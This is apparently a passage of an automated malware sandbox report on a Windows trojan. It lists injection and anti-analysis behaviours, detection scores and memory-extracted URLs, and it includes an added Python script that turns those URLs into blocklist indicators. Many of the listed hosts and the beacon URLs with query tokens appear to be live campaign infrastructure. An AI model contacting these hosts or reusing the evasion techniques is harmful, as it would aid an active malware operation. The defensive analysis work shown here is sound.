                • netsh.exe (started): Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Tries to detect virtualization through RDTSC time measurements, Switches to a custom stack to bypass stack traces
                  • cmd.exe (started)
                    • conhost.exe (started)

          Source | Detection | Scanner | Label
          8t1uarSZFV.exe | 55% | ReversingLabs | Win32.Trojan.AutoInMalInjector
          8t1uarSZFV.exe | 47% | Virustotal |
          8t1uarSZFV.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
          No Antivirus matches
Name | Malicious | Antivirus Detection | Reputation
http://www.00050591.xyz/jd21/?4h6=+5nsDbzeU2p9U7f/EDv04YNxDKhKydlr4qi/vE56uC3vG/MRVEljVAr+s/LnjHWqip0u&tT=MHNp | true | Avira URL Cloud: safe | unknown
www.crucka.xyz/jd21/ | true | Avira URL Cloud: safe | unknown
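The URL tables in this report are memory-extracted strings, not clean indicators: several entries end in what looks like a trailing "Referer:" header fragment, others run one "/jd21/" URL straight into the next hostname, some are listed without a scheme, and two carry the full request query. The following Python is an added example, not code from the Joe Sandbox report or its tooling. It normalizes a handful of those strings (copied from the tables on this page and embedded as constructed sample input) into a deduplicated host list plus the observed beacon parameters, then joins the hosts against a subset of the report's resolution table. Treating "/jd21/" as the campaign path marker, reading the "Referer:" tail as header residue, and falling back from a "www." name to its apex when joining against DNS results are all assumptions drawn from the tables, not statements the report makes.

```python
"""Turn memory-extracted URL strings from a sandbox report into clean IOCs.

Added example, not code from the Joe Sandbox report or its tooling. The
sample strings below are copied from the URL tables on this page; treating
"/jd21/" as the campaign path marker is an inference from those tables.
"""
import re
from urllib.parse import urlsplit

# Constructed sample: strings exactly as the report lists them. Memory
# extraction fused some with neighbouring data: what looks like a trailing
# "Referer:" header fragment, or the next hostname of the domain list.
SAMPLE_STRINGS = [
    "http://www.batremake.com/jd21/",
    "http://www.crucka.xyzReferer:",
    "http://www.00050591.xyz/jd21/www.californiacurrentelectric.com",
    "http://www.susansellsmarin.com/jd21/www.urbanholidayz.com",
    "http://www.uhug.xyz/jd21/www.maioral-store.com",
    "http://www.maioral-store.comReferer:",
    "www.crucka.xyz/jd21/",
    "http://www.00050591.xyz/jd21/?4h6=+5nsDbzeU2p9U7f/EDv04YNxDKhKydlr4qi"
    "/vE56uC3vG/MRVEljVAr+s/LnjHWqip0u&tT=MHNp",
    "https://urbanholidayz.com/jd21/?4h6=58Yhl8pxScvjrZW7vdX/11LwICGJdJmrB7bkiksH"
    "/i9UnBAUhv3EZPgtL2ZDcYGs",
    "https://excel.office.com",   # ordinary explorer.exe memory content
]

# Constructed from the report's resolution table (subset); None = "unknown".
SAMPLE_DNS = {
    "www.batremake.com": "213.186.33.5",
    "californiacurrentelectric.com": "66.235.200.145",
    "00050591.xyz": "65.21.196.90",
    "www.00050591.xyz": None,
    "www.californiacurrentelectric.com": None,
    "www.urbanholidayz.com": None,
    "www.crucka.xyz": None,
    "www.susansellsmarin.com": None,
}

CAMPAIGN_PATH = "/jd21/"          # assumption: the shared path is the campaign marker
_TRAILING_HEADER = re.compile(r"Referer:$")   # assumption: fused HTTP header residue
_HOSTNAME = re.compile(r"^[a-z0-9.-]+\.[a-z]{2,}$")


def clean(raw):
    """Split one raw string into (host, path, query, spillover_host).

    spillover_host is a hostname that memory extraction glued onto the end
    of the campaign path (the next entry of the domain list), else None.
    """
    s = _TRAILING_HEADER.sub("", raw.strip())
    if "://" not in s:                 # the report lists some entries scheme-less
        s = "http://" + s
    parts = urlsplit(s)
    host, path, query, spill = parts.hostname or "", parts.path, parts.query, None
    if not query and path.startswith(CAMPAIGN_PATH) and len(path) > len(CAMPAIGN_PATH):
        tail = path[len(CAMPAIGN_PATH):]
        if _HOSTNAME.match(tail):
            spill, path = tail, CAMPAIGN_PATH
    return host, path, query, spill


def extract_iocs(strings):
    """Return campaign hosts, observed beacon parameters and leftover hosts.

    A bare hostname (no campaign path) only counts as an indicator when the
    same host is also seen with the campaign path; everything else lands in
    'other', which for this report is ordinary explorer.exe content.
    """
    hosts, other, beacons = set(), set(), []
    for raw in strings:
        host, path, query, spill = clean(raw)
        if path.startswith(CAMPAIGN_PATH):
            hosts.add(host)
            if spill:
                hosts.add(spill)
            if query:
                # kept raw (no percent-decoding): '+' and '/' are part of the token
                params = dict(kv.split("=", 1) if "=" in kv else (kv, "")
                              for kv in query.split("&"))
                beacons.append((host, params))
        elif host:
            other.add(host)
    other -= hosts
    return {"hosts": sorted(hosts), "beacons": beacons, "other": sorted(other)}


def with_resolution(hosts, dns):
    """Map each host to the IP the sandbox observed, trying the apex name
    when only the www.-less form resolved (as with 00050591.xyz above)."""
    out = {}
    for h in hosts:
        ip = dns.get(h)
        if ip is None and h.startswith("www."):
            ip = dns.get(h[4:])
        out[h] = ip
    return out


if __name__ == "__main__":
    result = extract_iocs(SAMPLE_STRINGS)
    for host, ip in with_resolution(result["hosts"], SAMPLE_DNS).items():
        print(f"{host:40} {ip or 'unresolved'}")
    for host, params in result["beacons"]:
        print("beacon", host, sorted(params))
    print("not attributed:", result["other"])
```

On the sample input the bare "www.crucka.xyz" and "www.maioral-store.com" strings are attributed to the campaign only because the same hosts also appear with the "/jd21/" path or as spillover from it; "excel.office.com" stays unattributed. Hosts that resolved only under their apex name (00050591.xyz, californiacurrentelectric.com) still get their IP through the fallback, which is what you want before turning the list into blocklist or hunt entries.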
Name | Malicious | Antivirus Detection | Reputation (the memory dumps each string was found in follow on the indented "source:" line)
http://www.p-afactorysale.shop/jd21/ | false | 2%, Virustotal; Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.tech-with-thulitha.site/jd21/www.fostertv.net | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://aka.ms/odirmr | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4148832143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108048542.00000000079FB000.00000004.00000001.00020000.00000000.sdmp
http://www.crucka.xyzReferer: | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.susansellsmarin.com | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.b2vvuc00.sbsReferer: | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
http://www.00050591.xyz/jd21/ | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://api.msn.com:443/v1/news/Feed/Windows? | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000003.3113987697.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
http://www.b2vvuc00.sbs/jd21/ | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://excel.office.com | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4157772828.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108835540.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3478580226.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp
http://www.p-afactorysale.shop/jd21/www.arthemis-168bet.site | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
http://www.crucka.xyz/jd21/www.tech-with-thulitha.site | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.tech-with-thulitha.siteReferer: | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.arthemis-168bet.site/jd21/www.fasci.online | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.b2vvuc00.sbs/jd21/www.tyumk.xyz | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.fostertv.netReferer: | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.urbanholidayz.com/jd21/ | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
http://www.susansellsmarin.comReferer: | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.tyumk.xyz/jd21/ | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmp
http://www.zaib.art/jd21/ | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://urbanholidayz.com/jd21/?4h6=58Yhl8pxScvjrZW7vdX/11LwICGJdJmrB7bkiksH/i9UnBAUhv3EZPgtL2ZDcYGs | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000002.4160740233.00000000112AF000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000003.00000002.4144970692.0000000003FBF000.00000004.10000000.00040000.00000000.sdmp
http://www.fostertv.net/jd21/www.p-afactorysale.shop | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000000.1718215415.000000000C893000.00000004.00000001.00020000.00000000.sdmp
http://www.susansellsmarin.com/jd21/ | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.zaib.artReferer: | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.fostertv.net/jd21/ | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
https://wns.windows.com/L | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4157772828.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C557000.00000004.00000001.00020000.00000000.sdmp
http://www.fasci.online/jd21/www.uhug.xyz | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://word.office.com | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4157772828.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108835540.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3478580226.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmp
http://www.batremake.com/jd21/ | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
http://www.urbanholidayz.com | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
http://www.crucka.xyz | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow- | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
http://www.uhug.xyzReferer: | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.crucka.xyz/jd21/ | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.zaib.art | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.arthemis-168bet.site/jd21/ | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
http://www.arthemis-168bet.site | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
https://www.rd.com/list/polite-habits-campers-dislike/ | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
https://android.notify.windows.com/iOS | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000000.1718215415.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp
http://www.00050591.xyz/jd21/www.californiacurrentelectric.com | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmp
http://www.californiacurrentelectric.com | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://outlook.com_ | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4157772828.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108835540.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3478580226.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp
http://www.susansellsmarin.com/jd21/www.urbanholidayz.com | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.b2vvuc00.sbs | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
http://www.tyumk.xyz | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
http://www.tech-with-thulitha.site/jd21/ | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.uhug.xyz/jd21/ | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.maioral-store.comReferer: | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmp
https://powerpoint.office.comcember | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4157772828.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108835540.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3478580226.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp
http://www.fasci.onlineReferer: | false | Avira URL Cloud: safe | unknown
